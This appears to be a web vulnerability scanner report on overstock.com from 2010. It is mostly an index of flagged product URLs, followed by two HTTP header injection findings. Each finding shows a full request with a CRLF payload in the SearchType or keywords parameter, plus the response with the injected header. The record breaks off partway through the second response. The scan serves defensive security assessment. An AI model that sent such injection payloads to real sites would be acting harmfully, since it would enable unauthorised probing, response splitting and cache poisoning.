2.393. http://www.overstock.com/Home-Garden/Winthrop-81-piece-Flatware-Set/5124073/product.html [name of an arbitrarily supplied request parameter]

2.394. http://www.overstock.com/Home-Garden/Wood-Bookcase-Display-Cabinet/4734278/product.html [name of an arbitrarily supplied request parameter]

2.395. http://www.overstock.com/Home-Garden/Wood-Corner-Computer-Desk/2481102/product.html [name of an arbitrarily supplied request parameter]

2.396. http://www.overstock.com/Home-Garden/Wrinkle-resistant-300-TC-Reversible-Solid-Stripe-Duvet-Cover-Set/4064084/product.html [name of an arbitrarily supplied request parameter]

2.397. http://www.overstock.com/Jewelry-Watches/10k-Gold-1-3ct-TDW-Black-and-White-Diamond-Heart-Ring-I-J-I2-I3/3300998/product.html [name of an arbitrarily supplied request parameter]

2.398. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-2ct-TDW-Round-Value-Diamond-Studs-K-L-I2-I3/3324616/product.html [name of an arbitrarily supplied request parameter]

2.399. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-4ct-TDW-Round-Diamond-3-stone-Earrings-H-I-I2-I3/2069877/product.html [name of an arbitrarily supplied request parameter]

2.400. http://www.overstock.com/Jewelry-Watches/14k-Gold-Overlay-Curved-Textured-Hinged-Bracelet/3846813/product.html [name of an arbitrarily supplied request parameter]

2.401. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-1-6ct-TDW-Diamond-Lightweight-Ring-I-J-I2-I3/2116823/product.html [name of an arbitrarily supplied request parameter]

2.402. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-Overlay-Martini-set-CZ-Earrings/3866859/product.html [name of an arbitrarily supplied request parameter]

2.403. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Hoop-Earrings/3998857/product.html [name of an arbitrarily supplied request parameter]

2.404. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Mini-hoop-Earrings/3998862/product.html [name of an arbitrarily supplied request parameter]

2.405. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Sterling-Silver-Multi-gemstone-Hoop-Earrings/3128810/product.html [name of an arbitrarily supplied request parameter]

2.406. http://www.overstock.com/Jewelry-Watches/18kt-Over-Sterling-Silver-and-1-8-ct-tw-Diamond-Bracelet-J-K-I3/4473432/product.html [name of an arbitrarily supplied request parameter]

2.407. http://www.overstock.com/Jewelry-Watches/22k-Gold-Silver-Double-Hoop-Diamond-cut-Earrings/3437593/product.html [name of an arbitrarily supplied request parameter]

2.408. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Diamond-accented-Quartz-Chronograph-Bracelet-Watch/4611516/product.html [name of an arbitrarily supplied request parameter]

2.409. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Large-Dial-Diamond-Quartz-Chronograph-Bracelet-Watch/3465738/product.html [name of an arbitrarily supplied request parameter]

2.410. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Saturnos-Skeleton-Dial-Automatic-Watch/4719552/product.html [name of an arbitrarily supplied request parameter]

2.411. http://www.overstock.com/Jewelry-Watches/Barbie-Interchangeable-Girls-Watch/3010615/product.html [name of an arbitrarily supplied request parameter]

2.412. http://www.overstock.com/Jewelry-Watches/Black-plated-Tungsten-Carbide-Band-8-mm/4747377/product.html [name of an arbitrarily supplied request parameter]

2.413. http://www.overstock.com/Jewelry-Watches/Breast-Cancer-Awareness-Designer-Bangle-Bracelet/4069809/product.html [name of an arbitrarily supplied request parameter]

2.414. http://www.overstock.com/Jewelry-Watches/Citizen-Eco-Drive-Mens-Chronograph-Canvas-Strap-Watch/3950639/product.html [name of an arbitrarily supplied request parameter]

2.415. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Mens-Watch/4421993/product.html [name of an arbitrarily supplied request parameter]

2.416. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Womens-Watch/4421886/product.html [name of an arbitrarily supplied request parameter]

2.417. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Womens-Silvertone-Watch/4421887/product.html [name of an arbitrarily supplied request parameter]

2.418. http://www.overstock.com/Jewelry-Watches/Disneys-Minnie-Mouse-Womens-Silvertone-Watch/4421888/product.html [name of an arbitrarily supplied request parameter]

2.419. http://www.overstock.com/Jewelry-Watches/Dufonte-by-Lucien-Piccard-Two-tone-Crystal-Watch/1856866/product.html [name of an arbitrarily supplied request parameter]

2.420. http://www.overstock.com/Jewelry-Watches/Fossil-ES2444-Womens-Stella-White-Glitz-Chrono-Watch/5074818/product.html [name of an arbitrarily supplied request parameter]

2.421. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Cubic-Zirconia-Accented-Silicone-Watch/4814479/product.html [name of an arbitrarily supplied request parameter]

2.422. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Mens-Dual-face-Genuine-Leather-Watch/4034798/product.html [name of an arbitrarily supplied request parameter]

2.423. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Polished-Swirl-Cuff-Watch/2925811/product.html [name of an arbitrarily supplied request parameter]

2.424. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Cubic-Zirconia-Accented-Silicone-Watch/4814916/product.html [name of an arbitrarily supplied request parameter]

2.425. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Rhinestone-Watch/2326288/product.html [name of an arbitrarily supplied request parameter]

2.426. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-CZ-Accent-Silicon-Link-style-Watch/4400944/product.html [name of an arbitrarily supplied request parameter]

2.427. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-CZ-Accent-Watch/4274322/product.html [name of an arbitrarily supplied request parameter]

2.428. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777296/product.html [name of an arbitrarily supplied request parameter]

2.429. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777298/product.html [name of an arbitrarily supplied request parameter]

2.430. http://www.overstock.com/Jewelry-Watches/Invicta-II-Mens-Stainless-Steel-Silver-Dial-Chronograph-Watch/4413284/product.html [name of an arbitrarily supplied request parameter]

2.431. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Invicta-II-Blue-Dial-Stainless-Steel-Watch/4354450/product.html [name of an arbitrarily supplied request parameter]

2.432. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Swiss-Quartz-Steel-Watch/1729425/product.html [name of an arbitrarily supplied request parameter]

2.433. http://www.overstock.com/Jewelry-Watches/Invicta-Pro-Diver-Mens-Automatic-Steel-Watch/1891965/product.html [name of an arbitrarily supplied request parameter]

2.434. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Mens-Black-Leather-Strap-Watch/5206267/product.html [name of an arbitrarily supplied request parameter]

2.435. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Womens-Mother-of-Pearl-Skeleton-Dial-Automatic-Watch/4750508/product.html [name of an arbitrarily supplied request parameter]

2.436. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-Freshwater-Pearl-and-Multigemstone-Necklace-7-10-mm/5197013/product.html [name of an arbitrarily supplied request parameter]

2.437. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-White-Pearl-Citrine-and-Jade-Bracelet-8-9-mm/3248501/product.html [name of an arbitrarily supplied request parameter]

2.438. http://www.overstock.com/Jewelry-Watches/Michael-Kors-Womens-MK5055-Chronograph-Watch/5084186/product.html [name of an arbitrarily supplied request parameter]

2.439. http://www.overstock.com/Jewelry-Watches/Pewter-Turquoise-and-Coral-Teardrop-Earrings/2552569/product.html [name of an arbitrarily supplied request parameter]

2.440. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-5ct-TDW-Brown-Diamond-Square-Ring/3671310/product.html [name of an arbitrarily supplied request parameter]

2.441. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-8ct-TDW-Diamond-Flower-Necklace/4048632/product.html [name of an arbitrarily supplied request parameter]

2.442. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-20-inch-Snake-Chain/2656194/product.html [name of an arbitrarily supplied request parameter]

2.443. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Bead-Bracelet/567747/product.html [name of an arbitrarily supplied request parameter]

2.444. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Accent-Buckle-Ring/4771446/product.html [name of an arbitrarily supplied request parameter]

2.445. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Cat-Necklace/4737276/product.html [name of an arbitrarily supplied request parameter]

2.446. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Pearl-and-Diamond-Necklace-9-10-mm/3804500/product.html [name of an arbitrarily supplied request parameter]

2.447. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Blue-Cubic-Zirconia-and-Marcasite-Earrings/4420243/product.html [name of an arbitrarily supplied request parameter]

2.448. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Bridal-Engagement-Ring-Set/4058274/product.html [name of an arbitrarily supplied request parameter]

2.449. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Heart-and-Key-Necklace/657565/product.html [name of an arbitrarily supplied request parameter]

2.450. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Created-Sapphire-and-1-10ct-TDW-Diamond-Earrings-I-J-I3/4107532/product.html [name of an arbitrarily supplied request parameter]

2.451. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Cultured-Freshwater-Pearl-Bracelet/1897192/product.html [name of an arbitrarily supplied request parameter]

2.452. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Diamond-Accent-Butterfly-Necklace/4138242/product.html [name of an arbitrarily supplied request parameter]

2.453. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Filigree-CZ-Ring/1006299/product.html [name of an arbitrarily supplied request parameter]

2.454. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Large-Fleur-de-Lis-Necklace/3037717/product.html [name of an arbitrarily supplied request parameter]

2.455. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Marcasite-and-Turquoise-Heart-Necklace/1871971/product.html [name of an arbitrarily supplied request parameter]

2.456. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Multi-gemstone-Stud-Earrings-Set-of-5/4094670/product.html [name of an arbitrarily supplied request parameter]

2.457. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Onyx-and-Marcasite-Heart-Locket-Necklace/753913/product.html [name of an arbitrarily supplied request parameter]

2.458. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Oval-Turquoise-Hook-Earrings/3232265/product.html [name of an arbitrarily supplied request parameter]

2.459. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Pave-Style-Round-Cut-CZ-Ring/2869562/product.html [name of an arbitrarily supplied request parameter]

2.460. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Picture-Frame-Pendant/1037779/product.html [name of an arbitrarily supplied request parameter]

2.461. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Princess-CZ-Bridal-Engagement-Ring-Set/4058275/product.html [name of an arbitrarily supplied request parameter]

2.462. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Tapered-Ring/629543/product.html [name of an arbitrarily supplied request parameter]

2.463. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-X-and-O-Diamond-Accent-Bracelet-J-K-I3/4405140/product.html [name of an arbitrarily supplied request parameter]

2.464. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Othello-Skeleton-Automatic-Watch/4692564/product.html [name of an arbitrarily supplied request parameter]

2.465. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Romeo-Automatic-Black-Strap-Watch/5109862/product.html [name of an arbitrarily supplied request parameter]

2.466. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Childrens-Pink-Blue-Flowers-Watch/5156959/product.html [name of an arbitrarily supplied request parameter]

2.467. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Silvertone-Flame-Digital-Watch/5141580/product.html [name of an arbitrarily supplied request parameter]

2.468. http://www.overstock.com/Jewelry-Watches/Timex-Womens-Stainless-Steel-Two-tone-Watch/5147164/product.html [name of an arbitrarily supplied request parameter]

2.469. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Brushed-and-Polished-Beveled-Edge-Ring-7-mm/5085667/product.html [name of an arbitrarily supplied request parameter]

2.470. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Grooved-Mens-Wedding-Band/3460866/product.html [name of an arbitrarily supplied request parameter]

2.471. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Mens-1-5ct-TDW-Diamond-Comfort-fit-Band-8-mm/4311094/product.html [name of an arbitrarily supplied request parameter]

2.472. http://www.overstock.com/Jewelry-Watches/Tungsten-with-Black-and-Blue-Carbon-Fiber-Inlay-Ring-8-mm/5162780/product.html [name of an arbitrarily supplied request parameter]

2.473. http://www.overstock.com/Jewelry-Watches/White-Rhodium-Overlay-Cubic-Zirconia-Bridal-inspired-Rings-Set/4338561/product.html [name of an arbitrarily supplied request parameter]

2.474. http://www.overstock.com/Luggage-Bags/CalPak-Negotiator-Expandable-Soft-Messenger-Briefcase/3443091/product.html [name of an arbitrarily supplied request parameter]

2.475. http://www.overstock.com/Luggage-Bags/CalPak-S-Curve-Solid-18-Inch-Lightweight-Utility-Backpack/3442998/product.html [name of an arbitrarily supplied request parameter]

2.476. http://www.overstock.com/Luggage-Bags/Heys-Digital-E-scale/4333013/product.html [name of an arbitrarily supplied request parameter]

2.477. http://www.overstock.com/Luggage-Bags/Heys-XCase-20-inch-Carry-on-Luggage/3378644/product.html [name of an arbitrarily supplied request parameter]

2.478. http://www.overstock.com/Luggage-Bags/Korus-Aca-De-Grande-19.5-inch-Wheeled-Backpack/4089367/product.html [name of an arbitrarily supplied request parameter]

2.479. http://www.overstock.com/Luggage-Bags/Olympia-22-inch-8-pocket-Rolling-Duffel/3147701/product.html [name of an arbitrarily supplied request parameter]

2.480. http://www.overstock.com/Luggage-Bags/Olympia-29-inch-8-pocket-Rolling-Duffel/3147702/product.html [name of an arbitrarily supplied request parameter]

2.481. http://www.overstock.com/Luggage-Bags/Olympia-30-inch-Drop-bottom-Rolling-Duffel-Bag/4226715/product.html [name of an arbitrarily supplied request parameter]

2.482. http://www.overstock.com/Luggage-Bags/Pacific-Gear-19-inch-Multi-Zippered-Pocket-Rolling-Backpack/5016785/product.html [name of an arbitrarily supplied request parameter]

2.483. http://www.overstock.com/Luggage-Bags/Purdue-Collegiate-Sport-Duffel/4579529/product.html [name of an arbitrarily supplied request parameter]

2.484. http://www.overstock.com/Luggage-Bags/Solo-Colombian-Leather-Laptop-Portfolio/3166854/product.html [name of an arbitrarily supplied request parameter]

2.485. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-4-piece-Luggage-Set/711428/product.html [name of an arbitrarily supplied request parameter]

2.486. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-Lightweight-29-inch-Rolling-Upright-Suitcase/3019553/product.html [name of an arbitrarily supplied request parameter]

2.487. http://www.overstock.com/Luggage-Bags/Travel-Select-Light-Weight-Amsterdam-21-inch-Carry-on/2969442/product.html [name of an arbitrarily supplied request parameter]

2.488. http://www.overstock.com/Luggage-Bags/Travelers-Choice-Siena-21-inch-Hybrid-Upright-Garment-Bag/4313510/product.html [name of an arbitrarily supplied request parameter]

2.489. http://www.overstock.com/Luggage-Bags/U.S.-Traveler-RIO-2-piece-Expandable-Carry-on-Luggage-Set/3275005/product.html [name of an arbitrarily supplied request parameter]

2.490. http://www.overstock.com/Main-Street-Revolution/Headbandz-Crochet-Unique-Flower-Headband/5178675/product.html [name of an arbitrarily supplied request parameter]

2.491. http://www.overstock.com/Office-Furniture/Boss-Caressoft-Reception-Box-Arm-Chair/2201945/product.html [name of an arbitrarily supplied request parameter]

2.492. http://www.overstock.com/Office-Furniture/Boss-Lumbar-Support-Executive-Chair/2377844/product.html [name of an arbitrarily supplied request parameter]

2.493. http://www.overstock.com/Office-Furniture/Boss-Mesh-Back-Task-Chair/2958050/product.html [name of an arbitrarily supplied request parameter]

2.494. http://www.overstock.com/Office-Furniture/Boss-NTR-Executive-Leather-Chair/3187832/product.html [name of an arbitrarily supplied request parameter]

2.495. http://www.overstock.com/Office-Furniture/Ergo-Mesh-High-back-Executive-Chair/3082638/product.html [name of an arbitrarily supplied request parameter]

2.496. http://www.overstock.com/Office-Furniture/Ergo-Value-Mesh-Medium-Back-Task-Chair/3861788/product.html [name of an arbitrarily supplied request parameter]

2.497. http://www.overstock.com/Office-Furniture/Lifetime-4-foot-Adjustable-Height-Fold-in-half-Table/4579208/product.html [name of an arbitrarily supplied request parameter]

2.498. http://www.overstock.com/Office-Furniture/Lifetime-Black-Personal-Folding-Table/4721849/product.html [name of an arbitrarily supplied request parameter]

2.499. http://www.overstock.com/Office-Furniture/Office-Star-Professional-Air-Grid-Deluxe-Task-Chair/2605023/product.html [name of an arbitrarily supplied request parameter]

2.500. http://www.overstock.com/Office-Supplies/Brother-LC51-Compatible-Deluxe-Ink-Combo-Pack-of-5/2667500/product.html [name of an arbitrarily supplied request parameter]

2.501. http://www.overstock.com/Office-Supplies/Cool-Lift-Laptop-Computer-Cooling-Stand/2543946/product.html [name of an arbitrarily supplied request parameter]

2.502. http://www.overstock.com/Office-Supplies/Cork-Wall-Tiles-Pack-of-4/4239510/product.html [name of an arbitrarily supplied request parameter]

2.503. http://www.overstock.com/Office-Supplies/Cross-Cut-Shredder/4761404/product.html [name of an arbitrarily supplied request parameter]

2.504. http://www.overstock.com/Office-Supplies/Cyber-Gel-Stress-Relief-Ball/2614320/product.html [name of an arbitrarily supplied request parameter]

2.505. http://www.overstock.com/Office-Supplies/Fellowes-Powershred-P-58Cs-Shredder/3829872/product.html [name of an arbitrarily supplied request parameter]

2.506. http://www.overstock.com/Office-Supplies/HP-56-Black-Ink-Cartridge-Remanufactured/3420430/product.html [name of an arbitrarily supplied request parameter]

2.507. http://www.overstock.com/Office-Supplies/Ink-Cartridge-Combo-for-HP-95-98-Remanufactured/4274383/product.html [name of an arbitrarily supplied request parameter]

2.508. http://www.overstock.com/Office-Supplies/Parker-Vector-Stainless-Steel-Medium-Point-Fountain-Pen/5072230/product.html [name of an arbitrarily supplied request parameter]

2.509. http://www.overstock.com/Office-Supplies/Pilot-Varsity-Multi-pack-Disposable-Fountain-Pens-Pack-of-7/4222380/product.html [name of an arbitrarily supplied request parameter]

2.510. http://www.overstock.com/Office-Supplies/The-Butt-Station-Blue-Assistant/3374082/product.html [name of an arbitrarily supplied request parameter]

2.511. http://www.overstock.com/Office-Supplies/Waterman-Phileas-Black-Fountain-Pen/5072231/product.html [name of an arbitrarily supplied request parameter]

2.512. http://www.overstock.com/Sports-Toys/Eccotemp-L5-Outdoor-Portable-Tankless-Water-Heater/3650782/product.html [name of an arbitrarily supplied request parameter]

2.513. http://www.overstock.com/Sports-Toys/Predator-Wear-Womens-Minnow-Snow-Pants/4333393/product.html [name of an arbitrarily supplied request parameter]

2.514. http://www.overstock.com/Sports-Toys/Slumberjack-Gallatin-15-degree-Mummy-Sleeping-Bag/5077923/product.html [name of an arbitrarily supplied request parameter]

2.515. http://www.overstock.com/Sports-Toys/Tour-Vision-Monterey-Edition-Sunglasses/3848541/product.html [name of an arbitrarily supplied request parameter]

2.516. http://www.overstock.com/Sports-Toys/Very-Bright-42-bulb-LED-Flashlight/3442486/product.html [name of an arbitrarily supplied request parameter]

2.517. http://www.overstock.com/Worldstock/Agate-Inlaid-Handbag-India/544846/product.html [name of an arbitrarily supplied request parameter]

2.518. http://www.overstock.com/Worldstock/Bamboo-Grove-Canvas-Wall-Art-China/5079546/product.html [name of an arbitrarily supplied request parameter]

2.519. http://www.overstock.com/Worldstock/Brass-plated-Circle-of-Life-Cuff-Bracelet-India/4714454/product.html [name of an arbitrarily supplied request parameter]

2.520. http://www.overstock.com/Worldstock/Chinese-Bamboo-Rug-2x3/3943579/product.html [name of an arbitrarily supplied request parameter]

2.521. http://www.overstock.com/Worldstock/Fused-Glass-Ocean-River-Meadow-Earrings-Chile/4655190/product.html [name of an arbitrarily supplied request parameter]

2.522. http://www.overstock.com/Worldstock/Garnet-and-Carnelian-Tropical-Orchard-Cluster-Earrings-Thailand/5074088/product.html [name of an arbitrarily supplied request parameter]

2.523. http://www.overstock.com/Worldstock/Genuine-Leather-Brown-Riddles-Bracelet-Thailand/3291263/product.html [name of an arbitrarily supplied request parameter]

2.524. http://www.overstock.com/Worldstock/Handcrafted-Recycled-Glass-Icicle-Ornaments-20-pack-India/550216/product.html [name of an arbitrarily supplied request parameter]

2.525. http://www.overstock.com/Worldstock/Handcrafted-Turquoise-Attitude-Silver-Ring-Mexico/5191699/product.html [name of an arbitrarily supplied request parameter]

2.526. http://www.overstock.com/Worldstock/Handmade-Glass-and-Agate-Summer-Meadow-Necklace-India/3167006/product.html [name of an arbitrarily supplied request parameter]

2.527. http://www.overstock.com/Worldstock/Iron-Dragon-Fly-Hanging-Bells-India/4042483/product.html [name of an arbitrarily supplied request parameter]

2.528. http://www.overstock.com/Worldstock/Oil-on-Canvas-Buddha-Profile-Painting-Indonesia/5036482/product.html [name of an arbitrarily supplied request parameter]

2.529. http://www.overstock.com/Worldstock/Pearl-River-of-Snow-Strand-Necklace-3-8-mm-Thailand/4611190/product.html [name of an arbitrarily supplied request parameter]

2.530. http://www.overstock.com/Worldstock/Ribbon-Candy-Electroplated-Earrings-Kenya/4349561/product.html [name of an arbitrarily supplied request parameter]

2.531. http://www.overstock.com/Worldstock/Set-of-2-Bold-Orange-Fortunes-Beaded-Wristband-Bracelets-Thailand/5086320/product.html [name of an arbitrarily supplied request parameter]

2.532. http://www.overstock.com/Worldstock/Set-of-2-Coins-of-The-Earth-Beaded-Wristband-Bracelets-Thailand/4787363/product.html [name of an arbitrarily supplied request parameter]

2.533. http://www.overstock.com/Worldstock/Silver-Filigree-Rain-Earrings-China/4798411/product.html [name of an arbitrarily supplied request parameter]

2.534. http://www.overstock.com/Worldstock/Tree-of-Life-24-inch-Wall-Hanging-Haiti/3471069/product.html [name of an arbitrarily supplied request parameter]

2.535. http://www.overstock.com/search [keywords parameter]

2.536. http://www.overstock.com/search [keywords parameter]



1. HTTP header injection  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.overstock.com/search [SearchType parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the SearchType request parameter is copied into the Set-Cookie response header. The payload 38a98%0d%0a33897e1ca0a was submitted in the SearchType parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=%60&SearchType=38a98%0d%0a33897e1ca0a HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:37:53 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:37:53 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:37:53 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3D38a98
33897e1ca0a
%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289320673271; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j32.overstock.com ssl:f
...[SNIP]...

1.2. http://www.overstock.com/search [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the Set-Cookie response header. The payload 6d6b5%0d%0ac2356b260d7 was submitted in the keywords parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=6d6b5%0d%0ac2356b260d7&SearchType=Header HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:35:31 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:35:31 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289320531725; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:35:31 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D6d6b5
c2356b260d7
